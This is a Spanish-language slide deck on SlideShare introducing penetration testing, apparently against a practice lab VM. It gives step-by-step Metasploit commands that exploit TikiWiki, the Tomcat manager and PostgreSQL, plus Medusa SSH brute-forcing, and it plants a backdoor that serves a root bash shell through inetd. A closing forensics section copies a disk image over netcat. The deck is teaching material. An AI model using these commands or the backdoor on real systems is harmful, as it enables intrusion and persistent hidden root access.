SlideShare ist ein Scribd-Unternehmen logo
1 von 15
PENTEST
Una pequeña mirada al mundo del hackin
Por que quiero ser un super
hacker?
Seguridad Informatica
● No hay un sistema 100% seguro.
● A parte de que es una ilusión hoy veremos que
tan complicado puede ser tomar el control de
un servidor.
Primeras técnicas de penetración
● Under desk password and over screen
password
NMAP
● #descubriendo nodos en la red
● nmap –sP 192.168.1.0/24
● #descubriendo servicios en el server
● nmap –sV 192.168.1.X (versiones de
programas)
● -O
Mmm interesante tiene un servidor
web, que vive ahí???
● Descubrimiento de directorios en el servidor
web
● # cd /pentest/web/dirbuster/
● # java –jar DirBuster-0.12.jar
● escribimos el target, seleccionamos un archivo
de directorio y listo le ponemos start
Un servicio de portal, veamos que
podemos hacer...
●
# cd /pentest/exploits/framework3/
●
msf> search tikiwiki
●
msf> use auxiliary/admin/tikiwiki/tikidblib
●
msf auxiliary(tikidblib) > show options
●
● msf auxiliary(tikidblib) > set RHOST 192.168.1.X
● > exploit
● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec
● msf> show options
●
> set RHOST 192.168.229.129
● > show payloads
● > set PAYLOAD generic/shell_bind_tcp
Bien ahora es el turno de tomcat
● http://ip:8180
●
● msf> search tomcat
●
● msf> use auxiliary/scanner/http/tomcat_mrg_login
●
● set RHOSTS 192.168.229.129
●
● set RPORT 8180
●
Y eso para que me sirve tomcat 2
● #como ya podemos accesar al manager corremos otro
exploit
● msf > use exploits/multi/http/tomcat_mgr_deploy
● set USERNAME tomcat
● set PASSWORD tomcat
● set RPORT 8180
● set RHOST 192.168.229.129
● set PAYLOAD linux/x86/shell_bind_tcp
● exploit
Y postgres tendrá algo que decir??
● search postgres
● msf > use auxiliary/scanner/postgres/postgres_login
● set RHOSTS IP
● run
● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder
leer archivos del server.
● msf > use auxiliary/admin/postgres/postgres_readfile
● show options
● set RHOSTS ip
● set PASSWORD pass
● set archivo a leer
● run
Y el SSH apa
● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc.
● -h <HOST>: Dirección IP objetivo.
● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin.
● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh.
● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords
iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’.
● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns
● # veamos si nuestro usuario puede hacerse root
● sudo -i
Te veo a la vuelta, pero seguro
regreso
● #nos aseguramos que en el archivo /etc/services tengamos el
servicio mpm con el puerto 45
● mpm 45/tcp
● #ahora agregamos una linea a la configuracion de xinetd en el
archivo /etc/inetd.conf
● mpm stream tcp root /bin/bash bash -i
● # y reiniciamos el servicio de xinetd, probamos con telnet y con
nmap
Aun me queda tiempo, bien veamos
un poco de analisis forense
● Ejecutemos netcat en el server en el que
haremos la investigacion para poder recibir la
copia del server
● nc -l 9000 > driveimage.dd
● Obtenemos una copia del SO.
● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
Sleuth kit
● Con estas herramientas podremos ver que
había en nuestro Disco.
● fls -f ext -m / -r driveimage.dd > datos-salida
● ils -f ext -m driveimage.dd >> datos-salida}
● mactime -b datos-salida yyyy-mm-dd..yyyy-
mm-dd > informe-actividad.yyyy
● icat -s -f ext driveimage.dd inodo
Gracias
● @cgsomera
● somera@tuxteno.com

Weitere ähnliche Inhalte

Was ist angesagt?

Was ist angesagt? (20)

Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
 
Configurar dns
Configurar dnsConfigurar dns
Configurar dns
 
Como crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendadoComo crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendado
 
Clase 1 introducción a symfony 2
Clase 1   introducción a symfony 2Clase 1   introducción a symfony 2
Clase 1 introducción a symfony 2
 
Manual de uso_de_squid
Manual de uso_de_squidManual de uso_de_squid
Manual de uso_de_squid
 
Administrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftpAdministrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftp
 
Squid
Squid Squid
Squid
 
0 entorno php
0 entorno php0 entorno php
0 entorno php
 
ssh en centos 7
ssh en centos 7ssh en centos 7
ssh en centos 7
 
Servidor ftp en centos 7
Servidor ftp en centos 7Servidor ftp en centos 7
Servidor ftp en centos 7
 
Criptografia
CriptografiaCriptografia
Criptografia
 
Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Clientes ligeros y Servidores NX
Clientes ligeros y Servidores NXClientes ligeros y Servidores NX
Clientes ligeros y Servidores NX
 
TScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote DesktopTScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote Desktop
 
Anonimo el libro hacker
Anonimo   el libro hackerAnonimo   el libro hacker
Anonimo el libro hacker
 
Proxy Squid en Ubuntu
Proxy Squid en UbuntuProxy Squid en Ubuntu
Proxy Squid en Ubuntu
 
Practica nas andrei
Practica nas andreiPractica nas andrei
Practica nas andrei
 
Instalar git, github, node js, quasar
Instalar git, github, node js, quasarInstalar git, github, node js, quasar
Instalar git, github, node js, quasar
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 

Andere mochten auch

deber base de datsos sql
deber base de datsos sqldeber base de datsos sql
deber base de datsos sqlGeovannyYungan
 
Singaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorSingaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorvane01si
 
Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)sheenk
 
Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extraitPhilippe Babut
 
First B Summer 1912
First B Summer 1912First B Summer 1912
First B Summer 1912werni4slide
 
Herramientas para crear y compartir
Herramientas para crear y compartir Herramientas para crear y compartir
Herramientas para crear y compartir GeovannyYungan
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frCharles Santos
 
Ciclo del nitrógeno
Ciclo del nitrógeno Ciclo del nitrógeno
Ciclo del nitrógeno José Camacho
 
Presentación logistica
Presentación logisticaPresentación logistica
Presentación logisticaStamar Project
 
Ejercicio importante word
Ejercicio importante wordEjercicio importante word
Ejercicio importante wordrijuanchocha
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2GeovannyYungan
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excelvane01si
 
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturWerning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturStefan Werning
 

Andere mochten auch (20)

deber base de datsos sql
deber base de datsos sqldeber base de datsos sql
deber base de datsos sql
 
Singaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorSingaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computador
 
Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)
 
Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extrait
 
Presentación lonjas
Presentación lonjasPresentación lonjas
Presentación lonjas
 
Zertifizierungen 1
Zertifizierungen 1Zertifizierungen 1
Zertifizierungen 1
 
First B Summer 1912
First B Summer 1912First B Summer 1912
First B Summer 1912
 
Herramientas para crear y compartir
Herramientas para crear y compartir Herramientas para crear y compartir
Herramientas para crear y compartir
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
 
Ciclo del nitrógeno
Ciclo del nitrógeno Ciclo del nitrógeno
Ciclo del nitrógeno
 
Eleccions
EleccionsEleccions
Eleccions
 
Presentación logistica
Presentación logisticaPresentación logistica
Presentación logistica
 
Actividad4
Actividad4Actividad4
Actividad4
 
Ejercicio importante word
Ejercicio importante wordEjercicio importante word
Ejercicio importante word
 
Psicología
PsicologíaPsicología
Psicología
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excel
 
Ecosistema
EcosistemaEcosistema
Ecosistema
 
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturWerning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
 
Foros TeresaValdez
Foros TeresaValdezForos TeresaValdez
Foros TeresaValdez
 

Ähnlich wie Pentesting Basico

Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmapztealt
 
Proyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesProyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesÁngel Sardinero López
 
Laboratorio "monitoreo con Pandora fms 2.0"
Laboratorio "monitoreo con Pandora  fms 2.0"Laboratorio "monitoreo con Pandora  fms 2.0"
Laboratorio "monitoreo con Pandora fms 2.0"sestebans
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulfsrcid
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapxavazquez
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os finalSteven Restrepo
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)cl0p3z
 
Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekrisozikox
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13peter69
 

Ähnlich wie Pentesting Basico (20)

Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Snort 2006
Snort 2006Snort 2006
Snort 2006
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmap
 
Proyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesProyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de Redes
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Laboratorio "monitoreo con Pandora fms 2.0"
Laboratorio "monitoreo con Pandora  fms 2.0"Laboratorio "monitoreo con Pandora  fms 2.0"
Laboratorio "monitoreo con Pandora fms 2.0"
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulf
 
Samba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slideSamba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slide
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os final
 
Clase6 (consola linux)
Clase6 (consola linux)Clase6 (consola linux)
Clase6 (consola linux)
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Mrtg ubuntu
Mrtg ubuntuMrtg ubuntu
Mrtg ubuntu
 
Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekris
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
 
Nagios
NagiosNagios
Nagios
 
Nmap
NmapNmap
Nmap
 

Kürzlich hochgeladen

Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxNataliaGonzalez619348
 
historieta materia de ecologías producto
historieta materia de ecologías productohistorieta materia de ecologías producto
historieta materia de ecologías productommartinezmarquez30
 
Presentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxPresentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxRosabel UA
 
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...MagalyDacostaPea
 
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).hebegris04
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Angélica Soledad Vega Ramírez
 
Cuadernillo de actividades eclipse solar.pdf
Cuadernillo de actividades eclipse solar.pdfCuadernillo de actividades eclipse solar.pdf
Cuadernillo de actividades eclipse solar.pdflizcortes48
 
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...Martin M Flynn
 
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdf
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdfBITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdf
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdfsolidalilaalvaradoro
 
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdfNUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdfEDNAMONICARUIZNIETO
 
ENSEÑAR ACUIDAR EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.
ENSEÑAR ACUIDAR  EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.ENSEÑAR ACUIDAR  EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.
ENSEÑAR ACUIDAR EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.karlazoegarciagarcia
 
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfMEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfJosé Hecht
 
Amor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAmor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAlejandrino Halire Ccahuana
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfssuser50d1252
 
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE     9-4-24 (1).docx4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE     9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docxMagalyDacostaPea
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOMARIBEL DIAZ
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfssuser50d1252
 

Kürzlich hochgeladen (20)

¿Amor o egoísmo? Esa es la cuestión.pptx
¿Amor o egoísmo? Esa es la cuestión.pptx¿Amor o egoísmo? Esa es la cuestión.pptx
¿Amor o egoísmo? Esa es la cuestión.pptx
 
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docxSecuencia didáctica.DOÑA CLEMENTINA.2024.docx
Secuencia didáctica.DOÑA CLEMENTINA.2024.docx
 
historieta materia de ecologías producto
historieta materia de ecologías productohistorieta materia de ecologías producto
historieta materia de ecologías producto
 
Presentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptxPresentación Bloque 3 Actividad 2 transversal.pptx
Presentación Bloque 3 Actividad 2 transversal.pptx
 
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
4° SES COM MAR 09 Leemos una noticia del dengue e identificamos sus partes (1...
 
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
HISTORIETA: AVENTURAS VERDES (ECOLOGÍA).
 
Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...Contextualización y aproximación al objeto de estudio de investigación cualit...
Contextualización y aproximación al objeto de estudio de investigación cualit...
 
Cuadernillo de actividades eclipse solar.pdf
Cuadernillo de actividades eclipse solar.pdfCuadernillo de actividades eclipse solar.pdf
Cuadernillo de actividades eclipse solar.pdf
 
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...
DIGNITAS INFINITA - DIGNIDAD HUMANA; Declaración del dicasterio para la doctr...
 
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdf
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdfBITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdf
BITÁCORA DE ESTUDIO DE PROBLEMÁTICA. TUTORÍA V. PDF 2 UNIDAD.pdf
 
El Bullying.
El Bullying.El Bullying.
El Bullying.
 
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdfNUEVO PLAN Y PROGRAMAS DE ESTUDIO  2022.pdf
NUEVO PLAN Y PROGRAMAS DE ESTUDIO 2022.pdf
 
ENSEÑAR ACUIDAR EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.
ENSEÑAR ACUIDAR  EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.ENSEÑAR ACUIDAR  EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.
ENSEÑAR ACUIDAR EL MEDIO AMBIENTE ES ENSEÑAR A VALORAR LA VIDA.
 
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdfMEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
MEDIACIÓN INTERNACIONAL MF 1445 vl45.pdf
 
Amor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdfAmor o egoísmo, esa es la cuestión por definir.pdf
Amor o egoísmo, esa es la cuestión por definir.pdf
 
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdfFichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
Fichas de Matemática DE SEGUNDO DE SECUNDARIA.pdf
 
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE     9-4-24 (1).docx4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE     9-4-24 (1).docx
4° SES MATE DESCOMP. ADIT. DE NUMEROS SOBRE CASOS DE DENGUE 9-4-24 (1).docx
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
 
Unidad 2 | Teorías de la Comunicación | MCDIU
Unidad 2 | Teorías de la Comunicación | MCDIUUnidad 2 | Teorías de la Comunicación | MCDIU
Unidad 2 | Teorías de la Comunicación | MCDIU
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
 

Pentesting Basico

  • 1. PENTEST Una pequeña mirada al mundo del hackin
  • 2. Por que quiero ser un super hacker?
  • 3. Seguridad Informatica ● No hay un sistema 100% seguro. ● A parte de que es una ilusión hoy veremos que tan complicado puede ser tomar el control de un servidor.
  • 4. Primeras técnicas de penetración ● Under desk password and over screen password
  • 5. NMAP ● #descubriendo nodos en la red ● nmap –sP 192.168.1.0/24 ● #descubriendo servicios en el server ● nmap –sV 192.168.1.X (versiones de programas) ● -O
  • 6. Mmm interesante tiene un servidor web, que vive ahí??? ● Descubrimiento de directorios en el servidor web ● # cd /pentest/web/dirbuster/ ● # java –jar DirBuster-0.12.jar ● escribimos el target, seleccionamos un archivo de directorio y listo le ponemos start
  • 7. Un servicio de portal, veamos que podemos hacer... ● # cd /pentest/exploits/framework3/ ● msf> search tikiwiki ● msf> use auxiliary/admin/tikiwiki/tikidblib ● msf auxiliary(tikidblib) > show options ● ● msf auxiliary(tikidblib) > set RHOST 192.168.1.X ● > exploit ● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec ● msf> show options ● > set RHOST 192.168.229.129 ● > show payloads ● > set PAYLOAD generic/shell_bind_tcp
  • 8. Bien ahora es el turno de tomcat ● http://ip:8180 ● ● msf> search tomcat ● ● msf> use auxiliary/scanner/http/tomcat_mrg_login ● ● set RHOSTS 192.168.229.129 ● ● set RPORT 8180 ●
  • 9. Y eso para que me sirve tomcat 2 ● #como ya podemos accesar al manager corremos otro exploit ● msf > use exploits/multi/http/tomcat_mgr_deploy ● set USERNAME tomcat ● set PASSWORD tomcat ● set RPORT 8180 ● set RHOST 192.168.229.129 ● set PAYLOAD linux/x86/shell_bind_tcp ● exploit
  • 10. Y postgres tendrá algo que decir?? ● search postgres ● msf > use auxiliary/scanner/postgres/postgres_login ● set RHOSTS IP ● run ● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder leer archivos del server. ● msf > use auxiliary/admin/postgres/postgres_readfile ● show options ● set RHOSTS ip ● set PASSWORD pass ● set archivo a leer ● run
  • 11. Y el SSH apa ● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc. ● -h <HOST>: Dirección IP objetivo. ● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin. ● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh. ● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’. ● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns ● # veamos si nuestro usuario puede hacerse root ● sudo -i
  • 12. Te veo a la vuelta, pero seguro regreso ● #nos aseguramos que en el archivo /etc/services tengamos el servicio mpm con el puerto 45 ● mpm 45/tcp ● #ahora agregamos una linea a la configuracion de xinetd en el archivo /etc/inetd.conf ● mpm stream tcp root /bin/bash bash -i ● # y reiniciamos el servicio de xinetd, probamos con telnet y con nmap
  • 13. Aun me queda tiempo, bien veamos un poco de analisis forense ● Ejecutemos netcat en el server en el que haremos la investigacion para poder recibir la copia del server ● nc -l 9000 > driveimage.dd ● Obtenemos una copia del SO. ● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
  • 14. Sleuth kit ● Con estas herramientas podremos ver que había en nuestro Disco. ● fls -f ext -m / -r driveimage.dd > datos-salida ● ils -f ext -m driveimage.dd >> datos-salida} ● mactime -b datos-salida yyyy-mm-dd..yyyy- mm-dd > informe-actividad.yyyy ● icat -s -f ext driveimage.dd inodo